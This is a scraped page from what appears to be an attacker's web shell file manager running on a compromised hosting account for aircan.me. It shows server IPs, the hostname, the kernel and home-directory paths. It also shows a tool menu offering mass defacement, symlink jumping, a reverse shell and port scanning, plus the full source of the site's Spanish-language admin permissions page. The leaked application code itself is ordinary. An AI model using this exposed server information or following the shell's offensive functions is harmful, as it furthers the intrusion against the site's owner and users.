Tul xxx Tul
User / IP
:
216.73.216.146
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
dondedy
/
admin
/
Viewing: admin_permissions.php
<?php include '../components/connect.php'; require_once '../components/admin_roles.php'; session_start(); $admin_id = $_SESSION['admin_id'] ?? null; if (!$admin_id) { header('location:admin_login.php'); exit(); } ensureAdminRolesSchema($conn); $currentRole = getRoleBySession($conn); if (!adminHasPermission($currentRole, 'admin_accounts')) { enforceAdminPermission('admin_accounts'); } $roleLabels = getAvailableAdminRoles(); $permissionLabels = getAdminPermissionLabels(); $rolePermissionMatrix = getAdminRolePermissions(); $targetId = isset($_GET['id']) ? (int)$_GET['id'] : 0; if ($targetId <= 0) { addAdminFlashMessage('Selecciona un usuario válido para actualizar.'); header('location:admin_accounts.php'); exit(); } $targetStmt = $conn->prepare('SELECT id, name, role FROM `admin` WHERE id = ? LIMIT 1'); $targetStmt->execute([$targetId]); $targetAdmin = $targetStmt->fetch(PDO::FETCH_ASSOC); if (!$targetAdmin) { addAdminFlashMessage('El usuario seleccionado no existe.'); header('location:admin_accounts.php'); exit(); } $currentTargetRole = normalizeAdminRole($targetAdmin['role'] ?? null); [$storedCustomPermissions, $storedCustomMode] = getAdminCustomPermissionsFromDb($conn, $targetId); $formRole = $currentTargetRole; $formCustomMode = $storedCustomMode; $formPermissions = $formCustomMode ? $storedCustomPermissions : ($rolePermissionMatrix[$formRole] ?? []); $allPermissions = array_keys($permissionLabels); $errors = []; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $submittedRole = normalizeAdminRole($_POST['role'] ?? $formRole); $submittedCustomMode = isset($_POST['custom_mode']) && $_POST['custom_mode'] === '1'; $submittedPermissions = $submittedCustomMode ? normalizeAdminPermissionList($_POST['permissions'] ?? []) : null; $formRole = $submittedRole; $formCustomMode = $submittedCustomMode; $formPermissions = $formCustomMode ? $submittedPermissions : ($rolePermissionMatrix[$formRole] ?? []); $isLastOwner = $currentTargetRole === 'owner' && $submittedRole !== 'owner' && countAdminsByRole($conn, 'owner') <= 1; if ($isLastOwner) { $errors[] = 'No puedes remover el último Propietario del sistema.'; } if ($formCustomMode && empty($formPermissions)) { $errors[] = 'Selecciona al menos una sección cuando activas los permisos personalizados.'; } if (empty($errors)) { if ($submittedRole !== $currentTargetRole) { $updateRoleStmt = $conn->prepare('UPDATE `admin` SET role = ? WHERE id = ?'); $updateRoleStmt->execute([$submittedRole, $targetId]); $currentTargetRole = $submittedRole; } if ($formCustomMode) { saveAdminCustomPermissions($conn, $targetId, $formPermissions); } else { saveAdminCustomPermissions($conn, $targetId, null); } if ($targetId === (int)$admin_id) { refreshAdminAccess($conn, $targetId); } addAdminFlashMessage('Permisos actualizados correctamente.'); header('location:admin_accounts.php'); exit(); } } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Configuración de permisos</title> <link rel="icon" href="../images/favicon.png" type="image/x-icon"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css"> <link rel="stylesheet" href="../css/admin_style.css"> <style> body.permissions-page { background: linear-gradient(135deg, #f5f9ff 0%, #fff7f3 100%); min-height: 100vh; } .permissions-page .form-container { padding: 2.5rem 1.5rem 3.5rem; max-width: 920px; margin: 0 auto; } .permissions-page .form-card { background: #fff; border-radius: 16px; padding: 2.25rem 2.5rem; box-shadow: 0 18px 42px rgba(17, 24, 39, 0.12); border: 1px solid rgba(226, 232, 240, 0.75); } .permissions-page .form-card h3 { margin-bottom: 1.5rem; font-size: 1.65rem; color: #1f2937; font-weight: 700; } .permissions-page .form-field { margin-bottom: 1.6rem; } .permissions-page .form-field label { display: block; font-weight: 600; margin-bottom: .55rem; color: #1e293b; } .permissions-page select.box, .permissions-page input.box, .permissions-page .box.inline { width: 100%; padding: .8rem .95rem; border-radius: .85rem; border: 1px solid #cbd5f5; font-size: 1rem; transition: border-color .2s ease, box-shadow .2s ease; } .permissions-page select.box:focus, .permissions-page input.box:focus { border-color: #ff7a45; box-shadow: 0 0 0 3px rgba(255, 122, 69, 0.18); } .permissions-page .custom-toggle { display: flex; align-items: center; gap: .75rem; background: #f8fafc; padding: 1rem 1.15rem; border-radius: .85rem; border: 1px solid #e2e8f0; } .permissions-page .custom-toggle input { width: 20px; height: 20px; } .permissions-page .permissions-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(240px, 1fr)); gap: .85rem; margin-top: 1rem; } .permissions-page .permission-item { border: 1px solid #e2e8f0; border-radius: .85rem; padding: .95rem 1.05rem; display: flex; align-items: center; gap: .75rem; background: linear-gradient(145deg, #ffffff, #f8fafc); transition: border-color .2s ease, box-shadow .2s ease; } .permissions-page .permission-item input[type="checkbox"] { width: 18px; height: 18px; } .permissions-page .permission-item.disabled { opacity: .55; } .permissions-page .permission-item:not(.disabled):hover { border-color: #ffb38a; box-shadow: 0 12px 25px rgba(255, 124, 67, 0.16); } .permissions-page .note { margin-top: 1rem; font-size: .96rem; color: #64748b; line-height: 1.45; } .permissions-page .flex-btn { display: flex; flex-wrap: wrap; gap: .85rem; margin-top: 2.2rem; justify-content: flex-end; } .permissions-page .flex-btn .btn, .permissions-page .flex-btn .option-btn { min-width: 160px; text-align: center; } .permissions-page .error-box { background: #fef2f2; border: 1px solid #fca5a5; color: #b91c1c; padding: 1rem 1.2rem; border-radius: .85rem; margin-bottom: 1.6rem; } @media (max-width: 900px) { .permissions-page .form-container { padding: 2rem 1.25rem 3rem; } .permissions-page .form-card { padding: 2rem 1.75rem; } } @media (max-width: 720px) { .permissions-page .form-card { padding: 1.75rem 1.5rem; } .permissions-page .permissions-grid { grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); } .permissions-page .custom-toggle { flex-direction: column; align-items: flex-start; gap: .55rem; } .permissions-page .flex-btn { justify-content: center; } } @media (max-width: 540px) { .permissions-page .form-container { padding: 1.5rem 1rem 2.5rem; } .permissions-page .form-card { padding: 1.5rem 1.2rem; } .permissions-page .form-card h3 { font-size: 1.45rem; } .permissions-page .permissions-grid { grid-template-columns: minmax(0, 1fr); } .permissions-page .permission-item { padding: .85rem .95rem; } .permissions-page .flex-btn { flex-direction: column-reverse; align-items: stretch; } .permissions-page .flex-btn .btn, .permissions-page .flex-btn .option-btn { width: 100%; min-width: 0; } } </style> </head> <body class="permissions-page"> <?php include '../components/admin_header.php'; ?> <section class="form-container"> <div class="form-card"> <h3>Permisos de <?= htmlspecialchars($targetAdmin['name']); ?></h3> <?php if (!empty($errors)): ?> <div class="error-box"> <ul> <?php foreach ($errors as $error): ?> <li><?= htmlspecialchars($error); ?></li> <?php endforeach; ?> </ul> </div> <?php endif; ?> <form action="" method="POST" class="permission-form"> <div class="form-field"> <label for="role">Rol base</label> <select name="role" id="role" class="box"> <?php foreach ($roleLabels as $roleKey => $roleLabel): ?> <option value="<?= $roleKey; ?>" <?= $formRole === $roleKey ? 'selected' : ''; ?>><?= htmlspecialchars($roleLabel); ?></option> <?php endforeach; ?> </select> </div> <div class="form-field"> <label class="custom-toggle" for="custom-mode"> <input type="checkbox" name="custom_mode" id="custom-mode" value="1" <?= $formCustomMode ? 'checked' : ''; ?>> <span>Activar selección manual de secciones</span> </label> </div> <div class="form-field"> <label>Secciones disponibles</label> <div class="permissions-grid" id="permissions-grid" data-enabled="<?= $formCustomMode ? '1' : '0'; ?>"> <?php $basePermissions = $rolePermissionMatrix[$formRole] ?? []; foreach ($allPermissions as $permissionKey): $isSelected = in_array($permissionKey, $formPermissions, true); $isDefault = in_array($permissionKey, $basePermissions, true); ?> <label class="permission-item <?= $formCustomMode ? '' : 'disabled'; ?>" data-permission="<?= $permissionKey; ?>"> <input type="checkbox" name="permissions[]" value="<?= $permissionKey; ?>" <?= $isSelected ? 'checked' : ''; ?> <?= $formCustomMode ? '' : 'disabled'; ?> data-default="<?= $isDefault ? '1' : '0'; ?>"> <span><?= htmlspecialchars($permissionLabels[$permissionKey]); ?></span> </label> <?php endforeach; ?> </div> <p class="note">Cuando la selección manual está desactivada el usuario heredará los permisos del rol base.</p> </div> <div class="flex-btn"> <a href="admin_accounts.php" class="option-btn">Cancelar</a> <button type="submit" class="btn">Guardar cambios</button> </div> </form> </div> </section> <script> const customToggle = document.getElementById('custom-mode'); const permissionsGrid = document.getElementById('permissions-grid'); const permissionInputs = permissionsGrid ? permissionsGrid.querySelectorAll('input[type="checkbox"]') : []; const roleSelect = document.getElementById('role'); function updatePermissionState() { const enabled = customToggle.checked; permissionsGrid.dataset.enabled = enabled ? '1' : '0'; permissionsGrid.querySelectorAll('.permission-item').forEach((item) => { if (enabled) { item.classList.remove('disabled'); } else { item.classList.add('disabled'); } }); permissionInputs.forEach((input) => { input.disabled = !enabled; if (!enabled) { input.checked = input.dataset.default === '1'; } }); } function syncDefaultPermissionsFromRole() { if (!customToggle.checked) { const selectedRole = roleSelect.value; const defaults = {}; <?php foreach ($rolePermissionMatrix as $roleKey => $rolePerms): ?> defaults['<?= $roleKey; ?>'] = <?= json_encode(array_values($rolePerms)); ?>; <?php endforeach; ?> const defaultList = defaults[selectedRole] || []; permissionInputs.forEach((input) => { input.dataset.default = defaultList.includes(input.value) ? '1' : '0'; if (!customToggle.checked) { input.checked = input.dataset.default === '1'; } }); } } if (customToggle && permissionsGrid) { customToggle.addEventListener('change', () => { updatePermissionState(); }); } if (roleSelect) { roleSelect.addEventListener('change', () => { syncDefaultPermissionsFromRole(); updatePermissionState(); }); } updatePermissionState(); </script> </body> </html>
Coded With 💗 by
0x6ick